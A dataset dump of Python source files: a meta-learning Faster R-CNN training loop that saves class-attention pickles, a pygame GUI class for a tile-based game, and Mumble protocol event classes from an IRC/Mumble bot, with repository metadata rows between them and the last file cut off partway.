            else:
                im_data.data.resize_(data[0].size()).copy_(data[0])
                im_info.data.resize_(data[1].size()).copy_(data[1])
                gt_boxes.data.resize_(data[2].size()).copy_(data[2])
                num_boxes.data.resize_(data[3].size()).copy_(data[3])
                im_data_list.append(im_data)
                im_info_list.append(im_info)
                gt_boxes_list.append(gt_boxes)
                num_boxes_list.append(num_boxes)
                # print(im_data_list)
            # Forward + backward pass; meta training adds the meta/similarity
            # losses, which are back-propagated in a second backward call.
            fasterRCNN.zero_grad()
            rois, rpn_loss_cls, rpn_loss_box, \
            RCNN_loss_cls, RCNN_loss_bbox, \
            rois_label, cls_prob, bbox_pred, meta_loss, simloss, dis_simloss = fasterRCNN(im_data_list, im_info_list, gt_boxes_list,
                                                                                          num_boxes_list)
            # print(rpn_loss_cls)
            if args.meta_train:
                #loss = rpn_loss_cls.mean() + rpn_loss_box.mean() + RCNN_loss_cls.mean() + sum(
                    #RCNN_loss_bbox) / args.batch_size + meta_loss / len(metaclass) + simloss + dis_simloss
                loss = rpn_loss_cls.mean() + rpn_loss_box.mean() + sum(RCNN_loss_bbox) / args.batch_size + meta_loss / len(metaclass)
                loss_0 = RCNN_loss_cls.mean() + simloss + dis_simloss
            else:
                loss = rpn_loss_cls.mean() + rpn_loss_box.mean() \
                       + RCNN_loss_cls.mean() + RCNN_loss_bbox.mean()
            loss_temp += loss.data[0]
            # backward
            optimizer.zero_grad()
            loss.backward(retain_graph=True)
            loss_0.backward()
            # if args.net == "vgg16" or "res101":
            # clip_gradient(fasterRCNN, 10.)
            optimizer.step()
            torch.cuda.empty_cache()
            # ---- Periodic logging (console + optional tensorboard) ----
            if step % args.disp_interval == 0:
                end = time.time()
                if step > 0:
                    loss_temp /= args.disp_interval # loss_temp is aver loss
                loss_rpn_cls = rpn_loss_cls.data[0]
                loss_rpn_box = rpn_loss_box.data[0]
                if not args.meta_train:
                    loss_rcnn_cls = RCNN_loss_cls.data[0]
                    loss_rcnn_box = RCNN_loss_bbox.data[0]
                else:
                    loss_rcnn_cls = RCNN_loss_cls.mean()
                    loss_rcnn_box = sum(RCNN_loss_bbox) / args.batch_size
                    loss_metarcnn = meta_loss / len(metaclass)
                    simloss = simloss
                    dis_simloss = dis_simloss
                fg_cnt = torch.sum(rois_label.data.ne(0))
                bg_cnt = rois_label.data.numel() - fg_cnt
                print("[session %d][epoch %2d][iter %4d] loss: %.4f, lr: %.2e" \
                      % (args.session, epoch, step, loss_temp, lr))
                print("\t\t\tfg/bg=(%d/%d), time cost: %f" % (fg_cnt, bg_cnt, end - start))
                if args.meta_train:
                    print("\t\t\trpn_cls: %.4f, rpn_box: %.4f, rcnn_cls: %.4f, rcnn_box %.4f, meta_loss %.4f, simloss: %.4f, dis_simloss %.4f" \
                          % (loss_rpn_cls, loss_rpn_box, loss_rcnn_cls, loss_rcnn_box, loss_metarcnn, simloss, dis_simloss ))
                else:
                    print("\t\t\trpn_cls: %.4f, rpn_box: %.4f, rcnn_cls: %.4f, rcnn_box %.4f" \
                          % (loss_rpn_cls, loss_rpn_box, loss_rcnn_cls, loss_rcnn_box))
                sys.stdout.flush()
                if args.use_tfboard:
                    info = {
                        'loss': loss_temp,
                        'loss_rpn_cls': loss_rpn_cls,
                        'loss_rpn_box': loss_rpn_box,
                        'loss_rcnn_cls': loss_rcnn_cls,
                        'loss_rcnn_box': loss_rcnn_box
                    }
                    niter = (epoch - 1) * iters_per_epoch + step
                    for tag, value in info.items():
                        writer.add_scalar(tag, value, niter)
                loss_temp = 0
                start = time.time()
        # ---- Save a checkpoint at the end of every epoch ----
        if args.meta_train:
            save_name = os.path.join(output_dir,
                                     '{}_{}_{}_{}_{}.pth'.format(str(args.dataset), str(args.net), shots, epoch,
                                                                 step))
        else:
            save_name = os.path.join(output_dir, '{}_{}_{}_{}.pth'.format(str(args.dataset), str(args.net),
                                                                          epoch, step))
        save_checkpoint({
            'session': args.session,
            'epoch': epoch + 1,
            'model': fasterRCNN.state_dict(),
            'optimizer': optimizer.state_dict(),
            'pooling_mode': cfg.POOLING_MODE,
            'class_agnostic': args.class_agnostic,
        }, save_name)
        print('save model: {}'.format(save_name))
        end = time.time()
        print(end - start)
    if args.meta_train: # to extract the mean classes attentions of shots for testing
        class_attentions = collections.defaultdict(list)
        class_attentions_t = collections.defaultdict(list)
        meta_iter = iter(metaloader)
        for i in range(shots):
            prndata, prncls = next(meta_iter)
            im_data_list = []
            im_info_list = []
            gt_boxes_list = []
            num_boxes_list = []
            im_data = torch.FloatTensor(1)
            if args.cuda:
                im_data = im_data.cuda()
            im_data = Variable(im_data, volatile=True)
            im_data.data.resize_(prndata.squeeze(0).size()).copy_(prndata.squeeze(0))
            im_data_list.append(im_data)
            attentions, attentions_t = fasterRCNN(im_data_list, im_info_list, gt_boxes_list, num_boxes_list,
                                                  average_shot=True)
            for idx, cls in enumerate(prncls):
                class_attentions[int(cls)].append(attentions[idx])
                class_attentions_t[int(cls)].append(attentions_t[idx])
        # calculate mean attention vectors of every class
        mean_class_attentions = {k: sum(v) / len(v) for k, v in class_attentions.items()}
        mean_class_attentions_t = {k: sum(v) / len(v) for k, v in class_attentions_t.items()}
        save_path = 'attentions'
        if not os.path.exists(save_path):
            os.mkdir(save_path)
        with open(os.path.join(save_path, str(args.phase) + '_shots_' + str(args.shots) + '_mean_class_attentions.pkl'), 'wb') as f:
            pickle.dump(mean_class_attentions, f, pickle.HIGHEST_PROTOCOL)
        print('save ' + str(args.shots) + ' mean classes attentions done!')
        with open(os.path.join(save_path, str(args.phase) + '_shots_' + str(args.shots) + '_mean_class_attentions_t.pkl'), 'wb') as t:
            pickle.dump(mean_class_attentions_t, t, pickle.HIGHEST_PROTOCOL)
        print('save ' + str(args.shots) + ' mean classes attentions_t done!')
| 836 | 2 | 103 |
8b572207b8865cd9cdb8ae107f4ea6e1955c9b1c | 16,228 | py | Python | systems/GameGUI.py | itsabugnotafeature/Raiders | 72c20a83c253538a3a41658a78cbc0fe5eca346b | [
"MIT"
] | 1 | 2022-03-27T05:36:44.000Z | 2022-03-27T05:36:44.000Z | systems/GameGUI.py | itsabugnotafeature/Raiders | 72c20a83c253538a3a41658a78cbc0fe5eca346b | [
"MIT"
] | null | null | null | systems/GameGUI.py | itsabugnotafeature/Raiders | 72c20a83c253538a3a41658a78cbc0fe5eca346b | [
"MIT"
] | null | null | null | import scripts.gui_elements
import scripts.tools
from scripts.Colors import Color
from scripts.variables.localvars import *
from systems.BaseSystem import BaseSystem
from scripts import highlights
# HELPER FUNCTIONS #
| 47.311953 | 126 | 0.575857 | import scripts.gui_elements
import scripts.tools
from scripts.Colors import Color
from scripts.variables.localvars import *
from systems.BaseSystem import BaseSystem
from scripts import highlights
class GUI(BaseSystem):
    """In-game GUI system: owns the chat/console widgets, tile highlights,
    pause menu, fight ability buttons and banner rendering.

    Rendering is done indirectly by posting SURFACE events via make_event();
    the z argument orders the layers.
    """
    def __init__(self):
        self.Engine = None
        self.game_vars = {}
        self.GUITheme = scripts.gui_elements.Theme(main_color=(178, 178, 178),
                                                   accent_color1=Color.Yellow,
                                                   accent_color2=Color.LightGoldenrodYellow,
                                                   accent_color3=(122, 59, 46),
                                                   chat_color=(147, 112, 219),
                                                   background_color1=(Color.with_alpha(200, Color.DimGray)),
                                                   error_color=Color.Red,
                                                   reward_color=(51, 153, 255),
                                                   fight_color=(255, 102, 0))
        # gui_list holds every widget; the *_addresses lists index into it
        # so groups (base / fight / pause) can be updated or removed together.
        self.gui_list = []
        self.base_gui_addresses = []
        self.fight_gui_addresses = []
        self.pause_gui_addresses = []
        # Pre-rendered tile overlays (80x80 board tiles, 68x68 inner tiles).
        self.pathing_highlight = pygame.Surface((80, 80), pygame.SRCALPHA)
        self.pathing_highlight.fill(Color.with_alpha(100, Color.WhiteSmoke))
        pygame.draw.rect(self.pathing_highlight, Color.with_alpha(200, Color.WhiteSmoke), (0, 0, 78, 78), 2)
        self.move_highlight = pygame.Surface((80, 80), pygame.SRCALPHA)
        self.move_highlight.fill(Color.with_alpha(100, Color.CornflowerBlue))
        pygame.draw.rect(self.move_highlight, Color.with_alpha(200, Color.CornflowerBlue), (0, 0, 78, 78), 2)
        self.choosing_highlight = pygame.Surface((68, 68), pygame.SRCALPHA)
        self.choosing_highlight.fill(Color.with_alpha(100, Color.Gray))
        pygame.draw.rect(self.choosing_highlight, Color.with_alpha(200, Color.DimGray), (0, 0, 66, 66), 2)
        # Rotated diamond used to mark the active sprite's tile.
        self.active_highlight = pygame.Surface(scripts.tools.get_square_size(70))
        self.active_highlight.fill(Color.LightGreen)
        scripts.tools.outline_square(self.active_highlight, Color.YellowGreen, 6)
        self.active_highlight.set_colorkey(Color.Black)
        self.active_highlight = pygame.transform.rotate(self.active_highlight, -45)
        self.name_plate_highlight = pygame.transform.scale(self.active_highlight, (12, 12))
        self.fight_highlight = pygame.Surface((68, 68), pygame.SRCALPHA)
        self.fight_highlight.fill(Color.with_alpha(100, Color.IndianRed))
        pygame.draw.rect(self.fight_highlight, Color.with_alpha(200, Color.IndianRed), (0, 0, 66, 66), 2)
        self.friendly_highlight = pygame.Surface((68, 68), pygame.SRCALPHA)
        self.friendly_highlight.fill(Color.with_alpha(100, Color.LightGreen))
        pygame.draw.rect(self.friendly_highlight, Color.with_alpha(200, Color.LightGreen), (0, 0, 66, 66), 2)
        self.banner = None
        self.DisplayBox = None
    def set_up(self):
        """Convert pre-rendered surfaces, build the base console widgets and
        render sprite name plates. Requires self.Engine to be set first."""
        self.pathing_highlight.convert()
        self.move_highlight.convert()
        self.fight_highlight.convert()
        self.friendly_highlight.convert()
        self.active_highlight.convert()
        self.active_highlight = highlights.BlinkingTile(self.active_highlight, (80, 210, 108))
        self.gui_list.append(scripts.gui_elements.ScrollingTextBox((4, self.Engine.window_height - 234, 400, 196),
                                                                   self.GUITheme))
        self.base_gui_addresses.append(0)
        self.gui_list.append(scripts.gui_elements.InputTextBox((4, self.Engine.window_height - 35, 400, 30),
                                                               self.GUITheme))
        self.base_gui_addresses.append(1)
        self.game_vars[OUTPUT_CONSOLE] = self.gui_list[0]
        for sprite in self.game_vars[SPRITE_LIST]:
            sprite.render_name(self.Engine.font, self.GUITheme)
    def handle_event(self, event):
        """Dispatch a pygame/custom event to the fight GUI, pause menu,
        banner and widget list as appropriate."""
        if event.type == FIGHT_EVENT:
            if event.subtype == FIGHT_BEGIN:
                self.display_fight_gui(event.player, event.monster)
            elif event.subtype == FIGHT_END:
                self.fight_clean_up()
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_ESCAPE:
                # NOTE(review): the pause menu is built when PAUSE is already
                # truthy and torn down otherwise — verify the flag's ordering
                # relative to whoever toggles PAUSE on escape.
                if self.game_vars[PAUSE]:
                    self.dehover_guis()
                    self.display_pause_gui()
                    for address in self.base_gui_addresses:
                        self.gui_list[address].handle_event(event)
                else:
                    self.pause_clean_up()
                    self.quit_confirm_clean_up()
        if event.type == BANNER:
            self.banner = event.banner
        if not self.game_vars[PAUSE]:
            # Make sure that if it is active, only the DisplayBox receives updates
            for gui in self.gui_list:
                gui.handle_event(event)
        else:
            if self.DisplayBox is None:
                for address in self.pause_gui_addresses:
                    self.gui_list[address].handle_event(event)
            else:
                self.DisplayBox.handle_event(event)
    def main_loop(self):
        """Per-frame update: emit tile highlights, name plates, health bars
        and widget surfaces for the renderer (via SURFACE events)."""
        if self.game_vars[GAME_STATE] == PATHING:
            if self.Engine.Logic.active_sprite.type =="player":
                self.make_pathing_highlight()
                self.make_highlight_tile()
            self.make_active_tile(self.Engine)
        if self.game_vars[GAME_STATE] == ATTACKING:
            if self.Engine.Logic.active_sprite.type == "player":
                self.make_attacking_tiles()
            self.make_active_tile(self.Engine)
        counter = 0
        for sprite in self.game_vars[SPRITE_LIST]:
            # Makes the info panels on the side for each sprite in play
            # TODO: also include dead bosses
            # pos = (counter*85, 10)
            # make_event(SURFACE, surf=sprite.get_nameplate(), pos=pos, z=1)
            # counter += 1
            if sprite.fightable:
                self.make_name_plate(sprite)
                if sprite.health < sprite.maxhealth:
                    self.make_health_bars(sprite)
        if self.DisplayBox is None:
            for gui in self.gui_list:
                gui.update(self.Engine)
        else:
            self.DisplayBox.update(self.Engine)
        for address in self.fight_gui_addresses + self.base_gui_addresses:
            gui = self.gui_list[address]
            make_event(SURFACE, surf=gui.render(), pos=gui.position, z=1)
        if self.banner is not None:
            self.update_blit_banner()
        if self.game_vars[PAUSE]:
            if self.DisplayBox is not None:
                make_event(SURFACE, surf=self.DisplayBox.render(), pos=self.DisplayBox.position, z=4)
            for address in self.pause_gui_addresses:
                gui = self.gui_list[address]
                make_event(SURFACE, surf=gui.render(), pos=gui.position, z=3)
    # HELPER FUNCTIONS #
    def make_health_bars(self, sprite):
        """Emit a small health bar surface above the given sprite's tile."""
        offset = (self.game_vars[BOARD_OFFSET][0] + self.game_vars[GRID_OFFSET][0],
                  self.game_vars[BOARD_OFFSET][1] + self.game_vars[GRID_OFFSET][1])
        pos = (sprite.pos[0] * self.game_vars[TILE_SIZE] + offset[0] + 12,
               sprite.pos[1] * self.game_vars[TILE_SIZE] + offset[1] + 60)
        surf = pygame.Surface((68, 4))
        surf.fill(Color.Brown)
        health_percentage = sprite.health / sprite.maxhealth
        color = scripts.tools.get_percentage_color(health_percentage)
        if health_percentage > 0:
            pygame.draw.rect(surf, color, (0, 0, health_percentage * surf.get_width(), 10))
        make_event(SURFACE, surf=surf, pos=pos, z=0)
    def make_name_plate(self, sprite):
        """Emit the sprite's rendered name (plus a marker if it is active)."""
        offset = (self.game_vars[BOARD_OFFSET][0] + self.game_vars[GRID_OFFSET][0],
                  self.game_vars[BOARD_OFFSET][1] + self.game_vars[GRID_OFFSET][1])
        pos = (sprite.pos[0] * self.game_vars[TILE_SIZE] + offset[0],
               sprite.pos[1] * self.game_vars[TILE_SIZE] + offset[1] - 50)
        if sprite == self.game_vars[ACTIVE_SPRITE]:
            make_event(SURFACE, surf=self.name_plate_highlight, pos=(pos[0]-12, pos[1]+3), z=1)
        make_event(SURFACE, surf=sprite.name_img, pos=pos, z=1)
    def make_attacking_tiles(self):
        """Highlight potential attack targets: hovered tiles get fight or
        friendly colours, other valid targets get the neutral overlay."""
        offset = (self.game_vars[BOARD_OFFSET][0] + self.game_vars[GRID_OFFSET][0],
                  self.game_vars[BOARD_OFFSET][1] + self.game_vars[GRID_OFFSET][1])
        for sprite in self.game_vars[SPRITE_LIST]:
            if self.game_vars[ADJUSTED_RMOUSE_POS] == sprite.pos:
                if sprite.type == "player":
                    if self.game_vars[FRIENDLY_FIRE]:
                        make_event(SURFACE, surf=self.friendly_highlight,
                                   pos=(sprite.pos[0] * 80 + offset[0] + 8,
                                        sprite.pos[1] * 80 + offset[1] + 6), z=0)
                    else:
                        make_event(SURFACE, surf=self.fight_highlight,
                                   pos=(sprite.pos[0] * 80 + offset[0] + 8,
                                        sprite.pos[1] * 80 + offset[1] + 6), z=0)
            else:
                if sprite.type == "monster":
                    make_event(SURFACE, surf=self.choosing_highlight,
                               pos=(sprite.pos[0] * 80 + offset[0] + 8,
                                    sprite.pos[1] * 80 + offset[1] + 6), z=0)
                elif sprite.type == "player" and self.game_vars[FRIENDLY_FIRE]:
                    make_event(SURFACE, surf=self.choosing_highlight,
                               pos=(sprite.pos[0] * 80 + offset[0] + 8,
                                    sprite.pos[1] * 80 + offset[1] + 6), z=0)
    def make_highlight_tile(self):
        """Highlight the hovered tile when it is a legal movement target."""
        if not self.game_vars[PAUSE]:
            if self.game_vars[ADJUSTED_RMOUSE_POS] in self.game_vars[MOVABLE_LIST]:
                offset = (self.game_vars[RMOUSE_POS][0]+self.game_vars[GRID_OFFSET][0],
                          self.game_vars[RMOUSE_POS][1]+self.game_vars[GRID_OFFSET][1])
                make_event(SURFACE, surf=self.move_highlight, pos=offset, z=0)
    def make_pathing_highlight(self):
        """Overlay every tile in MOVABLE_LIST with the pathing highlight."""
        offset = (self.game_vars[BOARD_OFFSET][0] + self.game_vars[GRID_OFFSET][0],
                  self.game_vars[BOARD_OFFSET][1] + self.game_vars[GRID_OFFSET][1])
        for spot in self.game_vars[MOVABLE_LIST]:
            make_event(SURFACE, surf=self.pathing_highlight.copy(),
                       pos=(spot[0] * 80 + offset[0],
                            spot[1] * 80 + offset[1]), z=0)
    def display_pause_gui(self):
        """Build the pause-menu buttons and register them in pause_gui_addresses."""
        # The number subtracted to self.Engine.window_width should equal the width of the button
        BUTTON_WIDTH = 400
        x = (self.Engine.window_width - BUTTON_WIDTH) / 2
        y = 150
        self.gui_list.append(scripts.gui_elements.Button((x, y + 48, BUTTON_WIDTH, 48), self.GUITheme,
                                                         text="Unpause", action=make_event,
                                                         action_kwargs={"type": pygame.KEYDOWN, "key": pygame.K_ESCAPE}))
        self.pause_gui_addresses.append(len(self.gui_list) - 1)
        self.gui_list.append(scripts.gui_elements.Button((x, y + 48 * 2 + 16, BUTTON_WIDTH, 48), self.GUITheme,
                                                         text="Quit", action=self.display_quit_confirm))
        self.pause_gui_addresses.append(len(self.gui_list) - 1)
        self.gui_list.append(scripts.gui_elements.Button((x, y + 48 * 3 + 32, BUTTON_WIDTH, 48), self.GUITheme,
                                                         text="Toggle Fullscreen", action=make_event,
                                                         action_kwargs={"type": FLSCRN_TOGGLE}))
        self.pause_gui_addresses.append(len(self.gui_list) - 1)
        self.gui_list.append(scripts.gui_elements.Button((x, y + 48 * 4 + 48, BUTTON_WIDTH, 48), self.GUITheme,
                                                         text="Toggle Mute", action=make_event,
                                                         action_kwargs={"type": VAR_CHANGE, "key": MUTE,
                                                                        "toggle": True}))
        self.pause_gui_addresses.append(len(self.gui_list) - 1)
        self.gui_list.append(scripts.gui_elements.Button((x, y + 48 * 5 + 64, BUTTON_WIDTH, 48), self.GUITheme,
                                                         text="(Not Implemented)"))
        self.pause_gui_addresses.append(len(self.gui_list) - 1)
    def dehover_guis(self):
        """Reset the hover state of every widget (used when pausing)."""
        for gui in self.gui_list:
            if isinstance(gui, scripts.gui_elements.Button) and gui.state != DISABLED:
                gui.state = BASE_STATE
                gui.update_blit_image()
            if isinstance(gui, scripts.gui_elements.ScrollingTextBox):
                gui.hover = False
                gui.update_message_board()
            if isinstance(gui, scripts.gui_elements.InputTextBox):
                gui.hover = False
                gui.update_message_board()
    def make_active_tile(self, engine):
        """Emit the blinking diamond marker on the active sprite's tile."""
        self.active_highlight.update(engine)
        active_sprite = self.Engine.Logic.active_sprite
        active_pos = active_sprite.pos
        center_offset = scripts.tools.center_offset((self.active_highlight.get_width(),
                                                     self.active_highlight.get_width()),
                                                    (80, 80))
        offset = (active_pos[0] * 80 + self.game_vars[BOARD_OFFSET][0]
                  + self.game_vars[GRID_OFFSET][0] + center_offset[0],
                  active_pos[1] * 80 + self.game_vars[BOARD_OFFSET][1]
                  + self.game_vars[GRID_OFFSET][1] + center_offset[1])
        make_event(SURFACE, surf=self.active_highlight.render(), pos=offset, z=0)
    def is_mouse_on_gui(self):
        """Return True if the mouse is over any widget's bounding box."""
        mouse_pos = pygame.mouse.get_pos()
        for gui in self.gui_list:
            if scripts.tools.is_in_bounds(mouse_pos, (gui.position[0], gui.position[1],
                                                      gui.width, gui.height)):
                return True
        return False
    def fight_clean_up(self):
        """Remove all fight widgets from gui_list (reverse order keeps the
        remaining addresses valid while popping)."""
        self.fight_gui_addresses.reverse()
        for address in self.fight_gui_addresses:
            self.gui_list.pop(address)
        self.fight_gui_addresses = []
    def set_engine(self, new_engine):
        """Attach the engine and share its game_vars dict."""
        self.Engine = new_engine
        self.game_vars = new_engine.game_vars
    def init(self, engine):
        """Engine entry point: wire up the engine then build the base GUI."""
        self.set_engine(engine)
        self.set_up()
    def display_fight_gui(self, player, target):
        """Create one AbilityButton per player ability, laid out in a 4-wide
        grid, and register them in fight_gui_addresses."""
        grid = self.Engine.Logic.grid
        for i in range(len(player.abilities)):
            ability = player.abilities[i]
            button_x = 580 + i % 4 * 135
            button_y = 740 + (int(i / 4)) * 110
            button = scripts.gui_elements.AbilityButton((button_x, button_y), i, ability, self.GUITheme, player, target, grid)
            button.update_usability()
            self.gui_list.append(button)
            self.fight_gui_addresses.append(len(self.gui_list) - 1)
    def pause_clean_up(self):
        """Remove all pause-menu widgets from gui_list."""
        self.pause_gui_addresses.reverse()
        for gui in self.pause_gui_addresses:
            self.gui_list.pop(gui)
        self.pause_gui_addresses = []
    def update_blit_banner(self):
        """Render the current banner and advance its animation."""
        make_event(SURFACE, surf=self.banner.render(), pos=self.banner.pos, z=4)
        # If it has more to do it returns itself, otherwise it returns None
        self.banner = self.banner.update(self.Engine)
    def display_quit_confirm(self):
        """Open a modal Yes/No confirmation box before quitting."""
        gui_elements = [
            scripts.gui_elements.Button((0, 0, 150, 40), self.GUITheme, text="Yes", action=make_event,
                                        action_kwargs={"type": pygame.QUIT}),
            scripts.gui_elements.Button((0, 0, 150, 40), self.GUITheme, text="No", action=self.quit_confirm_clean_up)
        ]
        self.DisplayBox = scripts.gui_elements.DisplayBox(gui_elements, title="Are you sure?")
    def quit_confirm_clean_up(self):
        """Dismiss the quit-confirmation modal."""
        self.DisplayBox = None
| 15,413 | 1 | 590 |
c5dc6a406b72c855d204ebef2026915104ccb941 | 10,616 | py | Python | system/events/mumble.py | UltrosBot/Ultros | 639efc11f73ebf7e8f47f0554aced00a559d9e2d | [
"Artistic-2.0"
] | 16 | 2015-01-02T00:16:11.000Z | 2019-06-03T06:23:11.000Z | system/events/mumble.py | UltrosBot/Ultros | 639efc11f73ebf7e8f47f0554aced00a559d9e2d | [
"Artistic-2.0"
] | 31 | 2015-01-18T12:14:53.000Z | 2018-01-07T13:32:29.000Z | system/events/mumble.py | UltrosBot/Ultros | 639efc11f73ebf7e8f47f0554aced00a559d9e2d | [
"Artistic-2.0"
] | 9 | 2015-02-13T09:38:53.000Z | 2020-11-29T19:59:32.000Z | # coding=utf-8
"""
Events specific to Mumble-based protocols
"""
__author__ = 'Gareth Coles'
from system.events.base import BaseEvent
class MumbleEvent(BaseEvent):
    """
    Base class for all Mumble events. These are only thrown from the Mumble
    protocol; if an event subclasses this, it's a Mumble event.
    """
class Reject(MumbleEvent):
    """
    A reject - fired when the server turns our connection attempt away.
    """
    type = ""
    reason = ""

    def __init__(self, caller, typ, reason):
        """
        :param caller: The protocol that fired this event
        :param typ: The rejection type reported by the server
        :param reason: The reason given for the rejection
        """
        self.type, self.reason = typ, reason
        super(Reject, self).__init__(caller)
class CodecVersion(MumbleEvent):
    """
    Codec version message.
    """
    # TODO: Update this docstring when we know what this is for
    alpha = ""
    beta = ""
    prefer_alpha = False
    opus = ""

    def __init__(self, caller, alpha, beta, prefer_alpha, opus):
        """
        Store the codec fields exactly as received, then defer to the base.
        """
        self.alpha, self.beta = alpha, beta
        self.prefer_alpha, self.opus = prefer_alpha, opus
        super(CodecVersion, self).__init__(caller)
class CryptoSetup(MumbleEvent):
    """
    Crypto setup message.
    """
    # TODO: Update this docstring when we know what this is for
    key = ""
    client_nonce = ""
    server_nonce = ""

    def __init__(self, caller, key, client_n, server_n):
        """
        Store the key and both nonces, then defer to the base event.
        """
        self.key = key
        self.client_nonce, self.server_nonce = client_n, server_n
        super(CryptoSetup, self).__init__(caller)
class PermissionsQuery(MumbleEvent):
"""
Permissions query - Sent when.. we query permissions?
"""
# TODO: Update this docstring when we know what this is for
channel = None
permissions = ""
flush = ""
def __init__(self, caller, channel, permissions, flush):
"""
Initialise the event object.
"""
self.channel = channel
self.permissions = permissions
self.flush = flush
super(PermissionsQuery, self).__init__(caller)
class ServerSync(MumbleEvent):
"""
Server sync message - Sent when we connect to the server
"""
session = ""
max_bandwidth = ""
permissions = ""
welcome_text = ""
def __init__(self, caller, session, max_bandwidth, welcome_text,
permissions):
"""
Initialise the event object.
"""
self.session = session
self.max_bandwidth = max_bandwidth
self.welcome_text = welcome_text
self.permissions = permissions
super(ServerSync, self).__init__(caller)
class ServerConfig(MumbleEvent):
"""
Server config message
"""
# TODO: Update this docstring when we know what this is for
max_bandwidth = ""
welcome_text = ""
allow_html = True
message_length = 0
image_message_length = 0
def __init__(self, caller, max_bandwidth, welcome_text, allow_html,
message_length, image_message_length):
"""
Initialise the event object.
"""
self.max_bandwidth = max_bandwidth
self.welcome_text = welcome_text
self.allow_html = allow_html
self.message_length = message_length
self.image_message_length = image_message_length
super(ServerConfig, self).__init__(caller)
class Ping(MumbleEvent):
"""
A ping, I guess
"""
timestamp = ""
good = 0
late = 0
lost = 0
resync = 0
tcp = 0
udp = 0
tcp_avg = 0
udp_avg = 0
tcp_var = 0
udp_var = 0
def __init__(self, caller, timestamp, good, late, lost, resync, tcp, udp,
tcp_avg, udp_avg, tcp_var, udp_var):
"""
Initialise the event object.
"""
self.timestamp = timestamp
self.good = good
self.late = late
self.lost = lost
self.resync = resync
self.tcp = tcp
self.udp = udp
self.tcp_avg = tcp_avg
self.udp_avg = udp_avg
self.tcp_var = tcp_var
self.udp_var = udp_var
super(Ping, self).__init__(caller)
class UserRemove(MumbleEvent):
"""
User removal message
It looks like this is fired under three conditions..
* When a user disconnects or loses connection
* *kicker* will be None in that case
* When a user is kicked
* *kicker* will be set and ban will be False
* When a user is banned
* *kicker* will be set and ban will be True
This still requires some more research, the Mumble docs are awful.
"""
# TODO: Update this docstring when we're more sure of it
session = "" # Session ID
actor = "" # Session ID
user = None # User object
kicker = None # User object
reason = "" # Reason
ban = False # True if banned, false if kicked
def __init__(self, caller, session, actor, user, reason, ban, kicker):
"""
Initialise the event object.
"""
self.caller = caller
self.session = session
self.actor = actor
self.user = user
self.reason = reason
self.ban = ban
self.kicker = kicker
super(UserRemove, self).__init__(caller)
class Unknown(MumbleEvent):
"""
Unknown message - Called when we get a message that isn't already
handled
"""
type = ""
message = None
def __init__(self, caller, typ, message):
"""
Initialise the event object.
"""
self.type = typ
self.message = message
super(Unknown, self).__init__(caller)
class UserJoined(MumbleEvent):
"""
User join - Sent when a user joins the server
"""
user = None
def __init__(self, caller, user):
"""
Initialise the event object.
"""
self.user = user
super(UserJoined, self).__init__(caller)
class UserMoved(MumbleEvent):
"""
User moved - Sent when a user moves channel, or is moved
This is also fired when a user connects.
"""
user = None
channel = None
old_channel = None
def __init__(self, caller, user, channel, old):
"""
Initialise the event object.
"""
self.user = user
self.channel = channel
self.old_channel = old
super(UserMoved, self).__init__(caller)
class UserStateToggleEvent(MumbleEvent):
"""
Base class for events that are simply user state toggles
Don't use this directly; inherit it!
"""
user = None
state = False
actor = None
def __init__(self, caller, user, state, actor=None):
"""
Initialise the event object.
"""
self.user = user
self.state = state
self.actor = actor
super(UserStateToggleEvent, self).__init__(caller)
class UserMuteToggle(UserStateToggleEvent):
"""
User mute toggle - Sent when a user is muted or unmuted (but not by
themselves)
state: True if muted, False if unmuted
"""
pass
class UserDeafToggle(UserStateToggleEvent):
"""
User deaf toggle - Sent when a user is deafened or undeafened (but not
by themselves)
state: True if deafened, False if undeafened
"""
pass
class UserSuppressionToggle(UserStateToggleEvent):
"""
User suppression toggle - Sent when a user is suppressed or
unsuppressed
state: True if suppressed, False if unsuppressed
"""
pass
class UserSelfMuteToggle(UserStateToggleEvent):
"""
User mute toggle - Sent when a user is muted or unmuted by
themselves
state: True if muted, False if unmuted
"""
pass
class UserSelfDeafToggle(UserStateToggleEvent):
"""
User deaf toggle - Sent when a user is deafened or undeafened by
themselves
state: True if deafened, False if undeafened
"""
pass
class UserPrioritySpeakerToggle(UserStateToggleEvent):
"""
Priority speaker toggle - Sent when a user is set as priority speaker
state: True if set, False if unset
"""
pass
class UserRecordingToggle(UserStateToggleEvent):
"""
Recording toggle - Sent when a user starts or stops recording
state: True if started, False if stopped
"""
pass
class UserStats(MumbleEvent):
"""
User stats updated
user: User whose stats have been updated
"""
def __init__(self, caller, user):
"""
Initialise the event object.
"""
self.user = user
super(UserStats, self).__init__(caller)
class UserRegisteredEvent(MumbleEvent):
"""
Base class for user [un]registered events
Don't use this directly; inherit it!
"""
def __init__(self, caller, user, user_id, actor):
"""
Initialise the event object.
"""
self.user = user
self.user_id = user_id
self.actor = actor
super(UserRegisteredEvent, self).__init__(caller)
class UserRegistered(UserRegisteredEvent):
"""
User registered
user: User who has been registered
user_id: User's new ID
actor: User who registered `user`
"""
class UserUnregistered(UserRegisteredEvent):
"""
User unregistered
user: User who has been unregistered
user_id: User's old ID
actor: User who unregistered `user`
"""
class ChannelCreated(MumbleEvent):
"""
New channel - Sent when a channel is created
"""
channel = None
def __init__(self, caller, channel):
"""
Initialise the event object.
"""
self.channel = channel
super(ChannelCreated, self).__init__(caller)
class ChannelLinked(MumbleEvent):
"""
Channel link added - Sent when two channels are linked together
"""
from_channel = None
to_channel = None
def __init__(self, caller, from_, to_):
"""
Initialise the event object.
"""
self.from_channel = from_
self.to_channel = to_
super(ChannelLinked, self).__init__(caller)
class ChannelUnlinked(MumbleEvent):
"""
Channel link removed - Sent when two channels have their link removed
"""
from_channel = None
to_channel = None
def __init__(self, caller, from_, to_):
"""
Initialise the event object.
"""
self.from_channel = from_
self.to_channel = to_
super(ChannelUnlinked, self).__init__(caller)
| 20.815686 | 77 | 0.608986 | # coding=utf-8
"""
Events specific to Mumble-based protocols
"""
__author__ = 'Gareth Coles'
from system.events.base import BaseEvent
class MumbleEvent(BaseEvent):
"""
A Mumble event. This will only be thrown from the Mumble protocol.
If an event subclasses this, chances are it's a Mumble event.
"""
def __init__(self, caller):
super(MumbleEvent, self).__init__(caller)
class Reject(MumbleEvent):
"""
A reject - Sent when we aren't able to connect to a server
"""
type = ""
reason = ""
def __init__(self, caller, typ, reason):
"""
Initialise the event object.
"""
self.type = typ
self.reason = reason
super(Reject, self).__init__(caller)
class CodecVersion(MumbleEvent):
"""
Codec version message
"""
